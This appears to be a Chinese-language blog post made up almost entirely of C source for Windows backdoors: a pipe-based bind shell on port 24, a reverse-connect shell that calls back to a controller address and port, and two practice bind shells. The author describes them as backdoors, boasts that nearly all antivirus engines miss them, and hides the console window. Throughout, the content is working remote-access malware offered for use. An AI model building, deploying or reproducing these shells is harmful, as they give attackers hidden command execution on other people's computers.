先看看一个通过管道实现进程通信的后门
//
// 模仿Telnet(服务器)小程序(单管道版,本地监听24端口)
//
// 病毒检测: 多引擎杀毒只有一款冰岛的杀毒软件查杀其他全过
//
// 客户端 : windows自带telnet客户端 或者 nc 都可以
//
// 小 BUG : 有的时候不能及时显示命令返回信息,再敲一个回车就可以了,查找原因时
// 每当调试就立即返回信息,去掉断点的话还是得多输入回车,郁闷。
//
#include "stdafx.h"
#include <stdio.h>
#include <windows.h>
#include <winsock.h>
#pragma comment (lib, "Ws2_32")
//这个版本虽然回显不正确,但是仍然可以执行命令
int main(int argc, char* argv[])
{
//初始化网络库
WSADATA ws;
WSAStartup(MAKEWORD(2,2), &ws);
//socket地址
struct sockaddr_in CreateAddr;
struct sockaddr_in AcceptAddr;
//创建socket
int CreateSocket = socket(AF_INET, SOCK_STREAM, 0);
CreateAddr.sin_family = AF_INET;
CreateAddr.sin_port = htons(24);
CreateAddr.sin_addr.S_un.S_addr = INADDR_ANY;
bind(CreateSocket, (struct sockaddr *)&CreateAddr, sizeof(struct sockaddr));
listen(CreateSocket, 5);
printf("等待连接中......\n");
int AcceptAddrSize = sizeof(struct sockaddr_in);
int AcceptSocket = accept(CreateSocket, (struct sockaddr *)&AcceptAddr, &AcceptAddrSize);
printf("已有客户端成功连接\n");
//管道句柄
HANDLE hReadPipe;
HANDLE hWritePipe;
//打开管道
SECURITY_ATTRIBUTES pipeattr;
pipeattr.nLength = sizeof(SECURITY_ATTRIBUTES);
pipeattr.lpSecurityDescriptor = 0;
pipeattr.bInheritHandle = true;
BOOL ret_CreatePipe = CreatePipe(&hReadPipe, &hWritePipe, &pipeattr, 0);
//进程参数
STARTUPINFO SI;
memset(&SI, 0, sizeof(SI));
SI.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
SI.wShowWindow = SW_HIDE;
//SI.hStdOutput = SI.hStdError = hWritePipe;
SI.hStdOutput = hWritePipe;//输出命令执行结果
SI.hStdInput = hReadPipe;//获取命令
//进程信息
PROCESS_INFORMATION PI;
char cmdLine[MAX_PATH] = "cmd.exe";
BOOL ret_CreateProcess = CreateProcess(NULL, cmdLine, NULL, NULL, true, 0, NULL, NULL, &SI, &PI);
//管道读取缓冲区
char Buff_peek[MAX_PATH] = {0};
char Buff_read[MAX_PATH] = {0};
unsigned long lBytesRead;
char remoteCommandStr[MAX_PATH] = {0};
int remoteCommandLen = 0;
while(1)
{
//查询管道内是否有可读数据
BOOL ret_PeekNamedPipe = PeekNamedPipe(hReadPipe, Buff_peek, MAX_PATH, &lBytesRead, NULL, NULL);
int ret_send = 0;
if( lBytesRead )
{
BOOL ret_ReadFile = ReadFile(hReadPipe, Buff_read, lBytesRead, &lBytesRead, 0);
ret_send = send(AcceptSocket, Buff_read, lBytesRead, 0);
}
else
{
//接收发过来的数据
char buf[256] = {0};
int recvCount = recv(AcceptSocket,buf,256,0);
//telnet工具入口
if (recvCount==1 || recvCount==2)
{
if (!(buf[0]==0x0a && recvCount==1))
{
}
remoteCommandStr[remoteCommandLen++]=buf[0];
if (recvCount==2 && buf[0]==0x0d && buf[0]==0x0d)
{
printf("接受到命令:%s",remoteCommandStr);
if (strcmp(buf,"exit") == 0 || strcmp(buf,"bye") == 0)
{
return 0;
}
//执行命令
_sntprintf(cmdLine,MAX_PATH,"cmd.exe /c %s",remoteCommandStr);
BOOL ret_CreateProcess = CreateProcess(NULL, cmdLine, NULL, NULL, true, 0, NULL, NULL, &SI, &PI);
//初始化命令
remoteCommandLen = 0;
memset(remoteCommandStr,0,MAX_PATH);
}
}
else if (recvCount>3)//nc工具入口
{
//末尾置零
//buf[recvCount-1]= 0x00;
//执行命令
_sntprintf(cmdLine,MAX_PATH,"cmd.exe /c %s",buf);
BOOL ret_CreateProcess = CreateProcess(NULL, cmdLine, NULL, NULL, true, 0, NULL, NULL, &SI, &PI);
//初始化命令
remoteCommandLen = 0;
memset(remoteCommandStr,0,MAX_PATH);
}
}
}
return 0;
}
上面的小后门有个缺点就是不能反弹,可能加上lcx就可以反弹了,下面给出一份可以反弹的后门
//
// 模仿Telnet(服务器)小程序(WSASocket版,反弹式连接)
//
// 病毒检测: 多引擎杀毒只有一款冰岛的杀毒软件查杀其他全过
//
// 客户端 : 反弹式连接,启动时指定控制端地址和端口 telnet serverip serverport
//
//
#include "stdafx.h"
#include <stdio.h>
#include <winsock2.h>
#include <Windows.h>
#pragma comment (lib, "Ws2_32")
//隐藏窗口
#pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
int main(int argc, char* argv[])
{
//解析启动参数
if (argc!=3)
{
printf("==================================================\n");
printf("========usege:telnet serverip serverport=========\n");
printf("==================================================\n");
return 0;
}
char serverIP[20] = {0};
int serverPort;
strncpy(serverIP,argv[1],20);
serverPort = atoi(argv[2]);
//初始化网络库
WSADATA ws;
SOCKET ConnectSocket;
WSAStartup(MAKEWORD(2,2), &ws);
//连接到外网
struct sockaddr_in server;
server.sin_family = AF_INET;
server.sin_port = htons(serverPort);
server.sin_addr.S_un.S_addr = inet_addr(serverIP);
//无限循环
while (1)
{
//创建异步套接字
ConnectSocket = WSASocket(AF_INET, SOCK_STREAM, 0, NULL, 0, 0);
int ret_con;
do
{
Sleep(1000);
//连接到控制端
ret_con = connect(ConnectSocket, (struct sockaddr *)&server, sizeof(server));
}while (SOCKET_ERROR == ret_con);
//进程启动参数
STARTUPINFO SI;
memset(&SI, 0, sizeof(SI));
SI.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
SI.wShowWindow = SW_HIDE;
//输出信息
SI.hStdInput = SI.hStdOutput = SI.hStdError = (void *)ConnectSocket;
PROCESS_INFORMATION PI;
char cmdLine[] = "cmd.exe";
//创建进程
CreateProcess(NULL, cmdLine, NULL, NULL, 1, 0, NULL, NULL, &SI, &PI);
}
return 0;
}
下面再给出两个代码,一个双管实现通信的本地监听,一个是无管道本地监听,有了上面两份代码,下面两份代码就没有什么大用,只是做通信练习
// Server.cpp : Defines the entry point for the console application.
//
#include "stdafx.h"
#include <stdio.h>
#include <windows.h>
#include <winsock.h>
#pragma comment (lib, "Ws2_32")
int main(int argc, char* argv[])
{
WSADATA ws;
int CreateSocket;
int AcceptSocket;
struct sockaddr_in CreateAddr;
struct sockaddr_in AcceptAddr;
WSAStartup(MAKEWORD(2,2), &ws);
CreateSocket = socket(AF_INET, SOCK_STREAM, 0);
CreateAddr.sin_family = AF_INET;
CreateAddr.sin_port = htons(12345);
CreateAddr.sin_addr.S_un.S_addr = INADDR_ANY;
int ret_bind = bind(CreateSocket, (struct sockaddr *)&CreateAddr, sizeof(struct sockaddr));
int ret_listen = listen(CreateSocket, 5);
printf("等待连接中......");
int AcceptAddrSize;
AcceptAddrSize = sizeof(struct sockaddr_in);
AcceptSocket = accept(CreateSocket, (struct sockaddr *)&AcceptAddr, &AcceptAddrSize);
HANDLE hReadPipe;
HANDLE hWritePipe;
HANDLE hReadPipe2;
HANDLE hWritePipe2;
SECURITY_ATTRIBUTES pipeattr;
SECURITY_ATTRIBUTES pipeattr2;
pipeattr.nLength = 15;
pipeattr.lpSecurityDescriptor = 0;
pipeattr.bInheritHandle = true;
pipeattr2.nLength = 15;
pipeattr2.lpSecurityDescriptor = 0;
pipeattr2.bInheritHandle = true;
CreatePipe(&hReadPipe, &hWritePipe, &pipeattr, 0);
CreatePipe(&hReadPipe2, &hWritePipe2, &pipeattr2, 0);
//closesocket( CreateSocket );
//closesocket( AcceptSocket );
STARTUPINFO SI;
memset(&SI, 0, sizeof(SI));
SI.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
SI.wShowWindow = SW_HIDE;
SI.hStdOutput = SI.hStdError = hWritePipe;
SI.hStdInput = hReadPipe2;
PROCESS_INFORMATION PI;
char cmdLine[MAX_PATH] = "cmd.exe";
CreateProcess(NULL, cmdLine, NULL, NULL, true, 0, NULL, NULL, &SI, &PI);
char Buff[MAX_PATH];
unsigned long lBytesRead;
while(1)
{
PeekNamedPipe(hReadPipe, Buff, MAX_PATH, &lBytesRead, NULL, NULL);
if( lBytesRead )
{
ReadFile(hReadPipe, Buff, lBytesRead, &lBytesRead, 0);
send(AcceptSocket, Buff, lBytesRead, 0);
}
else
{
lBytesRead = recv(AcceptSocket, Buff, MAX_PATH, 0);
WriteFile(hWritePipe2, Buff, lBytesRead, &lBytesRead, 0);
}
}
return 0;
}
// Server.cpp : Defines the entry point for the console application.
//
#include <stdio.h>
#include <winsock2.h>
#pragma comment (lib, "Ws2_32")
int main(int argc, char* argv[])
{
WSADATA ws;
int CreateSocket;
int AcceptSocket;
struct sockaddr_in CreateAddr;
struct sockaddr_in AcceptAddr;
WSAStartup(MAKEWORD(2,2), &ws);
//CreateSocket = socket(AF_INET, SOCK_STREAM, 0);
CreateSocket = WSASocket(AF_INET, SOCK_STREAM, 0, NULL, 0, 0);
CreateAddr.sin_family = AF_INET;
CreateAddr.sin_port = htons(12345);
CreateAddr.sin_addr.S_un.S_addr = INADDR_ANY;
bind(CreateSocket, (struct sockaddr *)&CreateAddr, sizeof(struct sockaddr));
listen(CreateSocket, 5);
printf("等待连接中......");
int AcceptAddrSize;
AcceptAddrSize = sizeof(struct sockaddr_in);
AcceptSocket = accept(CreateSocket, (struct sockaddr *)&AcceptAddr, &AcceptAddrSize);
closesocket( CreateSocket );
//closesocket( AcceptSocket );
STARTUPINFO SI;
memset(&SI, 0, sizeof(SI));
SI.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
SI.wShowWindow = SW_HIDE;
SI.hStdInput = SI.hStdOutput = SI.hStdError = (void *)AcceptSocket;
PROCESS_INFORMATION PI;
char cmdLine[MAX_PATH] = "cmd.exe";
CreateProcess(NULL, cmdLine, NULL, NULL, true, 0, NULL, NULL, &SI, &PI);
return 0;
}